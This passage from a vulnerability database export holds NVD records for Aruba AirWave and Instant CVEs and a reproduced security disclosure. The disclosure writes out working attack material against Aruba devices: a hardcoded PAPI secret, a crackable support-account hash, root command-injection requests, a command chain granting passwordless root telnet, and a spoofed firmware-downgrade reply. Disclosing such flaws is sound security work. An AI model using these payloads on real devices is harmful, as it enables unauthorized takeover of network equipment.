      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-611"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-04-29 11:15
Modified
2024-11-21 05:54
Summary
A remote unauthorized access vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9692D1CE-E2C6-4B6E-BF21-4A15A8621E1D",
              "versionEndExcluding": "8.2.12.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote unauthorized access vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de acceso remoto no autorizado en Aruba AirWave Management Platform versiones anteriores a 8.2.12.1.\u0026#xa0;Aruba ha publicado parches para AirWave Management Platform que abordan esta vulnerabilidad de seguridad"
    }
  ],
  "id": "CVE-2021-25167",
  "lastModified": "2024-11-21T05:54:29.213",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-29T11:15:09.070",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-01-31 20:15
Modified
2024-11-21 02:47
Severity ?
Summary
Multiple vulnerabilities exists in Aruba Instate before 4.1.3.0 and 4.2.3.1 due to insufficient validation of user-supplied input and insufficient checking of parameters, which could allow a malicious user to bypass security restrictions, obtain sensitive information, perform unauthorized actions and execute arbitrary code.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1BF58E3A-491E-4E93-BB95-490E046D910B",
              "versionEndExcluding": "8.2.0.0",
              "versionStartIncluding": "",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A0E7368A-F76A-48A7-ACBA-E788A6A379B8",
              "versionEndExcluding": "4.1.3.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:arubanetworks:aruba_instant:4.2.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EE6FAE29-7941-46AA-A36E-9E190B5DFD56",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3E1323A-9E36-4F30-BB17-E7A6C203B094",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:siemens:scalance_w1750d_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "065280B2-6EC1-4721-B3D7-EDE44ED4F5BD",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:siemens:scalance_w1750d:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "FBC30055-239F-4BB1-B2D1-E5E35F0D8911",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple vulnerabilities exists in Aruba Instate before 4.1.3.0 and 4.2.3.1 due to insufficient validation of user-supplied input and insufficient checking of parameters, which could allow a malicious user to bypass security restrictions, obtain sensitive information, perform unauthorized actions and execute arbitrary code."
    },
    {
      "lang": "es",
      "value": "Se presentan m\u00faltiples vulnerabilidades en Aruba Instate versiones anteriores a 4.1.3.0 y 4.2.3.1, debido a una comprobaci\u00f3n insuficiente de la entrada suministrada por el usuario y una comprobaci\u00f3n insuficiente de los par\u00e1metros, lo que podr\u00eda permitir a un usuario malicioso omitir las restricciones de seguridad, obtener informaci\u00f3n confidencial, llevar a cabo acciones no autorizadas y ejecutar c\u00f3digo arbitrario."
    }
  ],
  "id": "CVE-2016-2031",
  "lastModified": "2024-11-21T02:47:39.030",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-01-31T20:15:10.570",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2016/May/19"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-431802.pdf"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "https://www.securityfocus.com/bid/90207"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2016/May/19"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-431802.pdf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "https://www.securityfocus.com/bid/90207"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-04-28 15:15
Modified
2024-11-21 05:54
Summary
A remote authentication restriction bypass vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9692D1CE-E2C6-4B6E-BF21-4A15A8621E1D",
              "versionEndExcluding": "8.2.12.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote authentication restriction bypass vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de omisi\u00f3n de restricci\u00f3n de autenticaci\u00f3n remota en Aruba AirWave Management Platform versiones anteriores a la 8.2.12.1.\u0026#xa0;Aruba ha publicado parches para AirWave Management Platform que abordan esta vulnerabilidad de seguridad"
    }
  ],
  "id": "CVE-2021-25147",
  "lastModified": "2024-11-21T05:54:26.713",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-28T15:15:08.010",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-287"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

var-202001-1252
Vulnerability from variot

A vulnerability exists in the Aruba AirWave Management Platform 8.x prior to 8.2 in the management interface of an underlying system component called RabbitMQ, which could let a malicious user obtain sensitive information. This interface listens on TCP port 15672 and 55672. Multiple Arubanetworks Products are prone to multiple security vulnerabilities. Attackers can exploit these issues to bypass security restrictions and perform unauthorized actions, obtain sensitive information, execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. Following products and versions are affected: ArubaOS (all versions) are vulnerable. Aruba Instant (all versions up to, but not including, 4.1.3.0 and 4.2.3.1) are vulnerable. The Vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive. Several of the high severity vulnerabilities listed in this report are related to the Aruba proprietary PAPI protocol and allow remote compromise of affected devices. AMP: RabbitMQ Management interface exposed 2. AMP: XSRF token uses weak calculation algorithm 3. AMP: Arbitrary modification of /etc/ntp.conf 4. AMP: PAPI uses static key for calculating validation checksum (auth bypass) 5. (I)AP: Insecure transmission of login credentials (GET) 6. (I)AP: Built in privileged "support" account 7. (I)AP: Static password hash for support account 8. (I)AP: Unusual account identified ("arubasecretadmin") 9. (I)AP: Privileged remote code execution 10. (I)AP: Radius passwords allow arbitrary raddb commands 11. (I)AP: Unauthenticated disclosure of environment variables 12. (I)AP: Information disclosure by firmware checking functionality 13. (I)AP: Unauthenticated automated firmware update requests 14. (I)AP: Firmware updater does not check certificates 15. (I)AP: Forceful downgrade of FW versions possible 16. (I)AP: Firmware update check discloses machine certificate 17. (I)AP: Firmware is downloaded via unencrypted connection 18. (I)AP: Firmware update Challenge/Response does not protect the Client 19. (I)AP: Unencrypted private keys and certs 20. (I)AP: Potential signature private key 21. (I)AP: PAPI Endpoints exposed to all interfaces 22. (I)AP: PAPI Endpoint does not validate MD5 signatures 23. (I)AP: PAPI protocol encrypted with weak encryption algorithm 24. (I)AP: PAPI protocol authentication bypass 25. (I)AP: Broadcast with detailed system information (LLDP) 26. (I)AP: User passwords are encrypted with a static key

Vulnerability Details

1. AMP: RabbitMQ Management interface exposed

AMPs expose the management frontend for the RabbitMQ message queue on all interfaces via tcp/15672 and tcp/55672.

# netstat -nltp | grep beam tcp 0 0 127.0.0.1:5672 0.0.0.0: LISTEN 2830/beam.smp tcp 0 0 127.0.0.1:17716 0.0.0.0: LISTEN 2830/beam.smp tcp 0 0 0.0.0.0:15672 0.0.0.0: LISTEN 2830/beam.smp tcp 0 0 0.0.0.0:55672 0.0.0.0: LISTEN 2830/beam.smp

The password for the default user "airwave" is stored in the world readable file /etc/rabbitmq/rabbitmq.config in plaintext:

# ls -l /etc/rabbitmq/rabbitmq.config -rw-r--r-- 1 root root 275 Oct 28 15:48 /etc/rabbitmq/rabbitmq.config # grep default_ /etc/rabbitmq/rabbitmq.config {default_user,<<"airwave">>}, {default_pass,<<"REMOVED">>}

2. AMP: XSRF token uses weak calculation algorithm

The XSRF token is calculated based on limited sources of entropy, consisting of the user's time of login and a random number between 0 and 99999. The algorithm Is approximated by the following example Python script:

base64.b64encode(hashlib.md5('%d%5.5d' % (int(time.time()), random.randint(0,99999))).digest())

3. AMP: Arbitrary modification of /etc/ntp.conf

Incorrect/missing filtering of input parameters allows injecting new lines and arbitrary commands into /etc/ntp.conf, when updating the NTP settings via the web frontend.

POST /nf/pref_network? HTTP/1.1 Host: 192.168.131.162 [...]

id=&ip_1=192.168.131.162&hostname_1=foo.example.com& subnet_mask_1=255.255.255.248&gateway_1=192.168.131.161&dns1_1=172.16.255.1& dns2_1=&eth1_enabled_1=0&eth1_ip_1=&eth1_netmask_1=& ntp1_1=time1.example.com%0afoo&ntp2_1=time2.example.com&save=Save

The above POST requests results in the following ntp.conf being generated:

# cat /etc/ntp.conf [...] server time1.example.com foo server time2.example.com

4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)

PAPI packets sent from an AP to an AMP are authenticated with a cryptographic checksum. The packet format is only partially known, as it's a proprietary format created by Aruba. A typical PAPI packet sent to an AMP is as follows:

0000 49 72 00 02 64 69 86 2d 7f 00 00 01 01 00 01 00 Ir..di.-........ 0010 20 1f 20 1e 00 01 00 00 00 01 3e f9 22 49 05 b3 . .......>."I.. 0020 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 P.@.]...F...

The following dissection of the above shown packet gives a more detailed overview of the format:

49 72 ID 00 02 Version 64 69 86 2d PAPI Destination IP 7f 00 00 01 PAPI Source IP 01 00 Unknown1 01 00 Unknown2 20 1f PAPI Source Port 20 1e PAPI Destination Port 00 01 Unknown3 00 00 Unknown4 00 01 Sequence Number 3e f9 Unknown5 22 49 05 b3 50 89 40 d3 5d 9d d6 af 46 98 c1 a6 Checksum

The checksum is based on a MD5 hash of a padded concatenation of all fields and a secret token. The secret token is hardcoded in multiple binaries on the AMP and can easily be retrieved via core Linux system tools:

$ strings /opt/airwave/bin/msgHandler | grep asd asdf;lkj763

Using this secret token it is possible to craft valid PAPI packets and issue commands to the AMP, bypassing the authentication based on the shared secret / token. This can be exploited to compromise of the device. Random sampling of different software versions available on Aruba's website confirmed that the shared secret is identical for all versions.

5. AP: Insecure transmission of login credentials (GET)

Username and password to authenticate with the AP web frontend are transmitted through HTTP GET. This method should not be used in a form that transmits sensitive data, because the data is displayed in clear text in the URL.

GET /swarm.cgi?opcode=login&user=admin&passwd=admin HTTP/1.1

The login URL can potentially appear in Proxy logs, the server logs or browser history. This possibly discloses the authentication data to unauthorized persons.

6. AP: Built in privileged "support" account

The APs provide a built in system account called "support". When connected to the restricted shell of the AP via SSH, issuing the command "support", triggers a password request:

00:0b:86:XX:XX:XX# support Password:

A quick internet search clarified, that this password is meant for use by Aruba engineers only: http://community.arubanetworks.com/t5/Unified-Wired-Wireless-Access/OS5-0-support-password/td-p/26760

Further research on that functionality lead to the conclusion that this functionality provides root-privileged shell access to the underlying operating system of the AP, given the correct password is entered.

7. AP: Static password hash for support account

The password hash for the "support" account mentioned in vulnerability #6 is stored in plaintext on the AP.

$ strings /aruba/bin/cli | grep ^bc5 bc54907601c92efc0875233e121fd3f1cebb8b95e2e3c44c14

Random sampling of different versions of Firmware images available on Aruba's website confirmed that the password hash is identical for all versions. The password check validating a given "support" password is based on the following algorithm:

SALT + sha1(SALT + PASSWORD)

Where SALT equals the first 5 bytes of the password hash in binary representation. It is possible to run a brute-force attack on this hash format using JtR with the following input format:

support:$dynamic_25$c92efc0875233e121fd3f1cebb8b95e2e3c44c14$HEX$bc54907601

8. AP: Unusual account identified ("arubasecretadmin")

The AP's system user configuration contains a undocumented account called "arubasecretadmin". This account was the root cause for CVE-2007-0932 and allowed administrative login with a static password.

/etc/passwd: nobody:x:99:99:Nobody:/:/sbin/nologin root:x:0:0:Root:/:/bin/sh admin:x:100:100:Admin:/:/bin/telnet3 arubasecretadmin:x:101:100:Aruba Admin:/:/bin/telnet2 serial:x:102:100:Serial:/:/bin/telnet4

Further tests indicated that login with this account seems not possible as it is not mapped through Arubas authentication mechanisms. The reason for it being still configured on the system is unknown.

9. AP: Privileged remote code execution

Insufficient checking of parameters allows an attacker to execute commands with root privileges on the AP. The vulnerable parameter is "image_url" which is used in the Firmware update function.

GET /swarm.cgi?opcode=image-url-upgrade&ip=127.0.0.1&oper_id=6&image_url=Aries@http://10.0.0.1/?"/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-C+/etc/mini_httpd.conf"&auto_reboot=false&refresh=true&sid=OWsiU5MM7DxVf9FRWe3P&nocache=0.9368100591919084 HTTP/1.1

The above example starts a new instance of mini_httpd on tcp/1234, which allows browsing the AP's filesystem. The following list of commands, if executed in order, start a telnet service that allows passwordless root login.

killall -9 utelnetd touch /tmp/telnet_enable echo #!/bin/sh > /bin/login echo /bin/sh >> /bin/login chmod +x /bin/login /sbin/utelnetd

Connecting to the telnet service started by the above command chain:

# telnet 10.0.XX.XX Trying 10.0.XX.XX... Connected to 10.0.XX.XX. Escape character is '^]'. Switching to Full Access /aruba/bin # echo $USER root /aruba/bin #

Potential exploits of this vulnerability can be detected through the AP's log file: [...] Jan 1 02:43:47 cli[2052]: <341004> |AP 00:0b:86:XX:XX:XX2@10.0.XX.XX cli| http://10.0.XX.XX/?"/sbin/utelnetd" [...]

10. AP: Radius passwords allow arbitrary raddb commands

Insufficient checking of the GET parameter "cmd" allows the injection of arbitrary commands and configuration parameters in the raddb configuration.

Example: GET /swarm.cgi?opcode=config&ip=127.0.0.1&cmd=%27user%20foo%20foo%22,my-setting%3d%3d%22blah%20portal%0Ainbound-firewall%0Ano%20rule%0Aexit%0A%27&refresh=false&sid=Lppj9jT2xQmYKqjEx5eP&nocache=0.10862623626107548 HTTP/1.1

/aruba/radius/raddb/users: foo Filter-Id == MAC-GUEST, Cleartext-Password := "foo",my-setting=="blah"

As shown in the above example, inserting a double-quote in the password allows to add additional commands after the password.

11. AP: Unauthenticated disclosure of environment variables

It is possible to request a listing of environment variables by requesting a specific URL on the AP's web server. The request does not require authentication.

GET /swarm.cgi?opcode=printenv HTTP/1.1

HTTP/1.0 200 OK Content-Type:text/plain; charset=utf-8 Pragma: no-cache Cache-Control: max-age=0, no-store

Environment variables

CHILD_INDEX=0 PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/lib SERVER_SOFTWARE= SERVER_NAME=10.0.XX.XX GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.0 SERVER_PORT=4343 REQUEST_METHOD=GET SCRIPT_NAME=/swarm.cgi QUERY_STRING=opcode=printenv REMOTE_ADDR=10.0.XX.XX REMOTE_PORT=58804 HTTP_REFERER=https://10.0.XX.XX:4343/ HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0 HTTP_HOST=10.0.XX.XX:4343

12. AP: Information disclosure by firmware checking functionality

When the AP checks device.arubanetworks.com for a new firmware version, it sends detailed information of the AP in plaintext to the remote host.

POST /firmware HTTP/1.1 Host: device.arubanetworks.com Content-Length: 2 Connection: keep-alive X-Type: firmware-check X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X-OEM-Tag: Aruba X-Mode: IAP X-Factory-Default: Yes X-Current-Version: 6.4.2.6-4.1.1.10_51810 X-Organization: REMOVED (Company Internal Name) X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155 X-Features: 0000100001001000000000000000000000000000000000010000000

13. AP: Unauthenticated automated firmware update requests

The web frontend of the AP provides functionality to initiate an automated firmware update. Doing so triggers the AP to initiate communication with device.arubanetworks.com and automatically download and install a new firmware image. The CGI opcode for that automatic update is "image-server-check" and it was discovered that the "sid" parameter is not checked for this opcode. Therefor an attacker can issue the automatic firmware update without authentication by sending the following GET request to the AP.

GET /swarm.cgi?opcode=image-server-check&ip=127.0.0.1&sid=x

As shown above, the "sid" parameter has to be submitted as part of the URL, but can be set to anything. Although all opcode actions follow the same calling scheme, "image-server-check" was the only opcode where the session ID was not validated.

Combined with other vulnerabilities (#14, #15), this could be exploited to install an outdated, vulnerable firmware on the AP.

14. AP: Firmware updater does not check certificates

The communication between AP and device.arubanetworks.com is secured by using SSL. The AP does not do proper certificate validation for the communication to device.arubanetworks.com. A typical SSL MiTM attack using DNS spoofing and a self-signed certificate allowed interception of the traffic between AP and device.arubanetworks.com.

15. AP: Forceful downgrade of FW versions possible

When checking device.arubanetworks.com for a new firmware image, the AP sends it's current version to the remote host. If there is no new firmware available, device.arubanetworks.com does not provide any download options. If the initial version sent from the AP is modified by an attacker (via MiTM), the remote server will reply with the current firmware version. The AP will then reject that firmware, as it's current version is more recent/the same. Downgrading the version does also not work based on the validation the AP does. This behaviour can be overwritten if an attacker intercepts and modifies the reply from device.arubanetworks.com and adds X-header called "X-Mandatory-Upgrade".

Example of a spoofed reply from device.arubanetworks.com:

HTTP/1.0 200 OK Date: Wed, 11 Nov 2015 12:12:20 GMT Content-Length: 91 Content-Type: text/plain; charset=UTF-8 X-Activation-Key: FXXXXXXX X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e X-Status-Code: success X-Type: firmware-check X-Mandatory-Upgrade: true Connection: close

6.4.2.6-4.1.1.10_51810 23 http://10.0.0.1:4321/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810

As shown above, the Header "X-Mandatory-Upgrade" was added to the server's reply. This causes the AP to skip its validation checks and accept any firmware version provided, regardless if it is the same or older than the current one.

16. AP: Firmware update check discloses machine certificate

While observing the traffic between an AP and device.arubanetworks.com, it was discovered that the AP discloses it's machine certificate to the remote endpoint.

POST /firmware HTTP/1.1 Host: 10.0.XX.XX Content-Length: 2504 Connection: close X-Type: firmware-check X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X-OEM-Tag: Aruba X-Mode: IAP X-Factory-Default: Yes X-Session-Id: e0b24fb1-e2f7-4e06-9473-1266b50a3fec X-Current-Version: 6.4.2.6-4.1.1.10_51810 X-Organization: REMOVED (Company Internal Name) X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155 X-Features: 0000100001001000000000000000000000000000000000010000000 X-Challenge-Hash: SHA-1

-----BEGIN CERTIFICATE----- MIIGTjCCBTagAwI... [...] -----END CERTIFICATE-----

The certificate sent in the above request is the same (in PEM format) as found under the following path on the AP:

/tmp/deviceCerts/certifiedKeyCert.der

Comparison of the certificate from the HTTP Request and from the AP filesystem:

$ sha256sum dumped-fw-cert.txt certifiedKeyCert.der.pem 68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8 dumped-fw-cert.txt 68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8 certifiedKeyCert.der.pem

17. AP: Firmware is downloaded via unencrypted connection

Firmware images are downloaded via unencrypted HTTP to the AP. An example reply containing the download paths looks as follows:

HTTP/1.1 200 OK Date: Wed, 11 Nov 2015 13:18:58 GMT Content-Length: 552 Content-Type: text/plain; charset=UTF-8 X-Activation-Key: FXXXXXXX X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e X-Status-Code: success X-Type: firmware-check Connection: close

6.4.2.6-4.1.1.10_51810 25 http://images.arubanetworks.com/fwfiles/ArubaInstant_Centaurus_6.4.2.6-4.1.1.10_51810 30 http://images.arubanetworks.com/fwfiles/ArubaInstant_Taurus_6.4.2.6-4.1.1.10_51810 15 http://images.arubanetworks.com/fwfiles/ArubaInstant_Cassiopeia_6.4.2.6-4.1.1.10_51810 10 http://images.arubanetworks.com/fwfiles/ArubaInstant_Orion_6.4.2.6-4.1.1.10_51810 23 http://images.arubanetworks.com/fwfiles/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810 26 http://images.arubanetworks.com/fwfiles/ArubaInstant_Pegasus_6.4.2.6-4.1.1.10_51810

An attacker could potentially MiTM connections to images.arubanetworks.com and possibly replace the firmware images downloaded by the AP.

18. AP: Firmware update Challenge/Response does not protect the Client

The update check process between AP and device.arubanetworks.com works as follows:

AP => device.arubanetworks.com POST /firmware X-Type: firmware-check

AP <= device.arubanetworks.com 200 OK X-Session-Id: bd4... X-Challenge: 123123...

AP => device.arubanetworks.com POST /firmware X-Session-Id: bd4...

[machine certificate] [signature]

AP <= device.arubanetworks.com 200 OK X-Session-Id: bd4...

    [firmware image urls]

When inspecting the communication process carefully, it is clear that the final response from device.arubanetworks.com does not contain any (cryptographic) signature. An attacker could impersonate device.arubanetworks.com, send an arbitrary challenge, ignore the response and just reply with a list of firmware images. The only thing that has to be kept the same over requests is the X-Session-Id header, which is also sent initially by the remote host and not the AP and therefore under full control of the attacker.

19. AP: Unencrypted private keys and certs

The AP firmware image contains the unencrypted private key and certificate for securelogin.arubanetworks.com issued by GeoTrust and valid until 2017. The key and cert was found under the path /aruba/conf/cpprivkey.pem.

